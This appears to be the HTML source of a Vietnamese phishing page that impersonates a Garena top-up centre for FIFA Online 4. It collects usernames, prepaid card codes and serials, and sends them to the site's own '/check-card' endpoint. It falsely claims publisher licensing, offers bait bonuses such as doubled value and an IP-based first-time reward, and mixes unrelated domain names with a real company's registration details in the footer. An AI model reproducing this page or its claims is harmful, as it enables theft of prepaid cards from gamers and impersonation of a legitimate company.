<!DOCTYPE html>
    <html lang="vi">
    
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <meta name="author" content="Nạp Sò">

    <link rel="icon" type="image/png" href="images/favicon.ico">

    <title>Sò Garena - Trung tâm nạp thẻ Garena</title>
    
    <meta name="description" content="Trang nạp FC FIFA Online 4 là đối tác chính thức của nhà phát hành Garena" />
    <meta name="keywords" content="nạp FIFA Online 4, nạp thẻ FIFA Online 4, nạp FC FIFA Online 4, nạp game FIFA Online 4, nạp tiền vào FIFA Online 4, nạp FC FIFA Online 4 miễn phí, nạp FIFA Online 4 vn, nạp FIFA Online 4 x5 FC, nạp FC FIFA Online 4 giá rẻ, shop nạp FC FIFA Online 4, nạp FC FIFA Online 4 x10, nạp FC FIFA Online 4 20k, nạp FC FIFA Online 4 10k, shop nạp FC FIFA Online 4 uy tín, nạp FC FIFA Online 4 giá rẻ 10k, nạp FC FIFA Online 4 giá rẻ, nạp FC FIFA Online 4 bằng thẻ viettel, nạp FC vào game FIFA Online 4, ... thì napgameauto.com chính là lựa chọn của bạn.">
    <meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1">

    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/napthe1.css">
    <link href="css/style.css" rel="stylesheet">


    <script src="js/jquery-3.2.1.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/custom1.js"></script>
  <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>

</head>
<nav class="navbar navbar-default navbar-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Menu</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href="/"><img class="navbar-brand" src="images/logo.png"  alt="Nạp thẻ Garena"></a>
<br><br>
</div>
</div>
</div>
</div>
</nav>
<section>
<div class="container">

<div class="banner"><img src="https://cdn.vn.garenanow.com/web/napthevn/sp_pc_19052022.png" alt=""></div>
<div class="main-section__title"><div class="main-section__title-txt main-section__title-channel"><img src="https://cdngarenanow-a.akamaihd.net/gop/app/0000/010/090/point.png" style="width:25px;height:25px;"> &nbsp; Nạp Sò</div></div>

<p class="alert alert-info">Nhận ngay <b><font color="red">5 000</font></b> <img src="https://cdngarenanow-a.akamaihd.net/gop/app/0000/010/090/point.png" style="width: 17px;height: 17px;"></td> khi nạp thẻ <b>lần đầu</b> có mệnh giá từ <b>200.000</b>₫ trở lên.<br/>Nhân đôi giá trị thẻ nạp cho <strong>lần nạp đầu tiên</strong>.<br/><span style="font-style: italic; font-size: 13px; margin-top:15px;color:red;">(Chú ý: Mỗi IP chỉ được hưởng ưu đãi một lần. Hệ thống nhận thấy địa chỉ IP của bạn chưa từng nạp thẻ)</span></p>

<div class="row">
<div class="col-md-6">
<div class="form-thanh-toan">


<div>
<div id="thongbao"></div>
<label for="mathe">Tên đăng nhập Garena:</label>
<input type="text" class="form-control" value="" name="account" placeholder="Nhập tên đăng nhập Garena">
</div>


<div>
<label>Loại thẻ:</label>
<br/>
<input type="hidden" name="loaithe" id="telco" value="">
<img class="loai-the" src="images/viettel.png" title="Nạp thẻ FIFA Online 4 bằng thẻ Viettel" alt="VIETTEL" value="VIETTEL">          
<img class="loai-the" src="images/mobifone.png" title="Nạp thẻ FIFA Online 4 bằng thẻ Mobifone" alt="MOBIFONE" value="MOBIFONE">         
<img class="loai-the" src="images/vinaphone.png" title="Nạp thẻ FIFA Online 4 bằng thẻ Vinaphone" alt="VINAPHONE" value="VINAPHONE">
<img class="loai-the" src="images/vietnamobile.png" title="Nạp thẻ FIFA Online 4 bằng thẻ Garena" alt="VNMOBI" value="VNMOBI">
<img class="loai-the" src="images/gate.png" title="Nạp thẻ FIFA Online 4 bằng thẻ GATE" alt="GATE" value="GATE">
</div>

<div>
<label for="menhgia">Mệnh giá thẻ:</label> <span style="font-style: italic; font-size: 13px; margin-top:15px;color:red;">(Chú ý: nếu chọn sai mệnh giá sẽ bị mất thẻ)</span>
<select name="menhgia" id="menhgia" class="form-control" required="required">
<option value="0" selected="selected">- Chọn mệnh giá -</option>
<option value="50000">50.000đ</option>
<option value="100000">100.000đ</option>
<option value="200000">200.000đ</option>
<option value="300000">300.000đ</option>
<option value="500000">500.000đ</option>
<option value="1000000">1.000.000đ</option>
</select>				
</div>

<div>
<label for="mathe">Mã thẻ:</label>
<input type="text" class="form-control" name="mathe" id="mathe" placeholder="Nhập mã dưới lớp tráng bạc ...">
</div>

<div>
<label for="seri">Số seri:</label>
<input type="text" class="form-control" name="seri" id="seri" placeholder="Nhập số seri in trên thẻ ...">
</div>

<p style="font-style: italic;font-size: 13px; margin-top:15px;">* Bằng cách nhấn "NẠP THẺ" đồng nghĩa bạn đã chấp nhận điều khoản của trang web.</p>

<div class="error-msg thongbaoloi hide"></div>  <!--- Thông báo lỗi nhập thiếu -->


<div style="padding-top: 8px;"><button id="napthe" name="napthe" class="btn btn-danger btn-block" data-loading-text="<i class='fa fa-spinner fa-spin'></i> ĐANG NẠP THẺ">NẠP THẺ</button></div>

</div>
</div>

<div class="col-md-offset-1 col-md-5" >
<h2 class="table-title" style="padding-top: 10px;"><b>Bảng giá quy đổi Sò</b></h2>
<table class="table table-hover" style="-webkit-box-shadow: 0 0 20px 0 rgb(0 0 0 / 10%);box-shadow: 0 0 20px 0 rgb(0 0 0 / 10%);">
<thead>
<tr>
<th class="text-danger" style="border: 1px solid #e1e1e1; text-align: center;">Mệnh giá</th>
<th class="text-danger" style="border: 1px solid #e1e1e1;  text-align: center;">Sò</th>
</tr>
</thead>
<tbody>
<tr>
<td style="border: 1px solid #e1e1e1; text-align: center;">50 000 VNĐ</td>
<td style="border: 1px solid #e1e1e1;  text-align: center;">280 <img src="https://cdngarenanow-a.akamaihd.net/gop/app/0000/010/090/point.png" style="width: 17px;height: 17px;"></td>
</tr>
<tr>
<td style="border: 1px solid #e1e1e1; text-align: center;">100 000 VNĐ</td>
<td style="border: 1px solid #e1e1e1;  text-align: center;">640 <img src="https://cdngarenanow-a.akamaihd.net/gop/app/0000/010/090/point.png" style="width: 17px;height: 17px;"></td>
</tr>
<tr>
<td style="border: 1px solid #e1e1e1; text-align: center;">200 000 VNĐ</td>
<td style="border: 1px solid #e1e1e1;  text-align: center;">14 40 <img src="https://cdngarenanow-a.akamaihd.net/gop/app/0000/010/090/point.png" style="width: 17px;height: 17px;"></td>
</tr>
<tr>
<td style="border: 1px solid #e1e1e1; text-align: center;">300 000 VNĐ</td>
<td style="border: 1px solid #e1e1e1;  text-align: center;">2 930  <img src="https://cdngarenanow-a.akamaihd.net/gop/app/0000/010/090/point.png" style="width: 17px;height: 17px;"></td>
</tr>
<tr>
<td style="border: 1px solid #e1e1e1; text-align: center;">500 000 VNĐ</td>
<td style="border: 1px solid #e1e1e1;  text-align: center;">6 900 <img src="https://cdngarenanow-a.akamaihd.net/gop/app/0000/010/090/point.png" style="width: 17px;height: 17px;"></td>
</tr>
<tr>
<td style="border: 1px solid #e1e1e1; text-align: center;">1 000 000 VNĐ</td>
<td style="border: 1px solid #e1e1e1;  text-align: center;">15 280 <img src="https://cdngarenanow-a.akamaihd.net/gop/app/0000/010/090/point.png" style="width: 17px;height: 17px;"></td>
</tr>
</tbody>
</table>
</div>
</div>
<hr/>

<h4>Giới thiệu</h4>
    <ul>
        <li>Được phát triển bởi đội ngũ quản trị viên thuộc nhà phát hành Garena. <strong><a style="color: #C9302C;" href="/">uudainapthe.vn</a></strong> luôn cho khách hàng sự tin tưởng và ưu đãi nhiều nhất khi <strong>nạp Sò</strong> tại <strong><a style="color: #C9302C;" href="/">uudainapthe.vn</a></strong>.</li>
        <li>Là trang nạp thẻ được cấp phép bởi nhà phát hành nên các hành động nạp thẻ trên hệ thống của chúng tôi đảm bảo <strong>an toàn</strong> tuyệt đối cho tài khoản của khách hàng.</li>
        <li><strong>FC FIFA Online 4</strong> sẽ được chuyển ngay lập tức vào tài khoản sau khi nạp thẻ.</li>
        <li>Khách hàng có thể yên tâm sử dụng dịch vụ của chúng tôi mà không cần lo ngại về vấn đề bảo mật.</li>
    </ul>

<hr/>

<h4>Hướng dẫn nạp thẻ</h4>
<ol>
    <li>Khách hàng cần chuẩn bị thẻ cào hợp lệ được cung cấp trên hệ thống. Các thẻ cào hợp lệ như <strong>Viettel</strong>, <strong>Vinaphone</strong>, <strong>Mobifone</strong>, <strong>Vietnamobile</strong> và <strong>GATE</strong>.</li>
    <li>Khách hàng nhập đầy đủ thông tin vào bảng nạp thẻ </strong>, chọn loại thẻ cần nạp, chọn mệnh giá của thẻ cào, điền số seri và mã thẻ cần nạp.</li>
    <li>Sau khi điền đầy đủ thông tin, khách hàng cần kiểm tra lại kỹ thông tin của mình để tránh trường hợp nhập sai dẫn đến bị mất thẻ.</li>
    <li>Khi đã kiểm tra thông tin điền vào bảng là chính xác. Khách hàng bấm vào nút <strong>"NẠP THẺ"</strong>.</li>
    <li>Sau khi bấm nút <strong>"NẠP THẺ"</strong> quý khách hàng vui lòng đợi hệ thống kiểm tra. Hệ thống kiểm tra hoàn tất quý khách hàng vui lòng đăng nhập vào game để nhận FC và phần thưởng.</li>
</ol>

</div>
<footer class="footer">
<div class="main-section">
CÔNG TY CỔ PHẦN PHÁT TRIỂN THỂ THAO ĐIỆN TỬ VIỆT NAM
<br>
Giấy CNĐKKD số 0103959912, cấp lần đầu ngày 09/06/2009 | Cơ quan cấp: Phòng Đăng ký kinh doanh - Sở Kế hoạch và đầu tư TP Hà Nội
<br>
Địa chỉ trụ sở chính: Tầng 29, Tòa nhà Trung tâm Lotte Hà Nội, số 54 đường Liễu Giai, Phường Cống Vị, Quận Ba Đình, TP Hà Nội, Việt Nam
<br>
Điện thoại: 09 15896520
</div>
<div class="container">
<nav class="footer-link-wrap">
<a class="footer-link-txt" href="#">Câu hỏi thường gặp</a> | <a class="footer-link-txt" href="#">Điều khoản sử dụng</a> | <a class="footer-link-txt" href="#">Chính sách bảo mật</a>
</nav>
<nav class="footer-link-wrap text-small">

</nav>
</div>
</footer>
<script>

    $(function(){	
    // function getRecaptcha() {

    // };		
    $('#napthe').click(function(e){
        e.preventDefault();
        // console.log('napthe clicked');
        
         /*$.ajax({
            dataType: 'jsonp',
            data: "data=yeah",						
            jsonp: 'callback',
            url: 'http://localhost:3000/endpoint?callback=?',						
            success: function(data) {
                console.log('success');
                console.log(JSON.stringify(data));
            }
        });*/

        var data = {};
        data.type = $("#telco").val();
        data.loaithe = $("#telco").val();
        data.amount = $("#menhgia").val();
        data.code = $("#mathe").val();
        data.serial = $("#seri").val();
        // console.log(data.serial = $("#seri").val());
        // console.log(data);
        
        $.ajax({
            url: '/check-card',						
            method: 'POST',
            dataType: 'json',
            // contentType: 'application/json',
            data: data,
            success: function(data) {
                console.log('success');
                console.log(data.status);
                // switch (data.status) {
                switch (data.status) {
                    case 1:
                        alert("Thẻ thành công đúng mệnh giá!");
                        break;
                
                    case 2:
                        alert("Thẻ thành công sai mệnh giá!");
                        break;
                    case 3:
                        alert("Thẻ lỗi!");
                        break;
                    case 4:
                        alert("Hệ thống bảo trì!");
                        break;
                    case 99:
                        alert("Thẻ chờ xử lý!");
                        break;
                    default:
                        alert("Gửi thẻ thất bại - Có lý do đi kèm ở phần thông báo trả về") ;
                        break;
                }
            },
            error  : function() { console.log('error');}
        });

        /*$.ajax('http://localhost:3000/endpoint', {
                type: 'POST',
                data: JSON.stringify(data),
                contentType: 'application/json',
                success: function() { console.log('success');},
                error  : function() { console.log('error');}
        });*/
    });				
});
</script>

</body>

<!-- -->
</html>
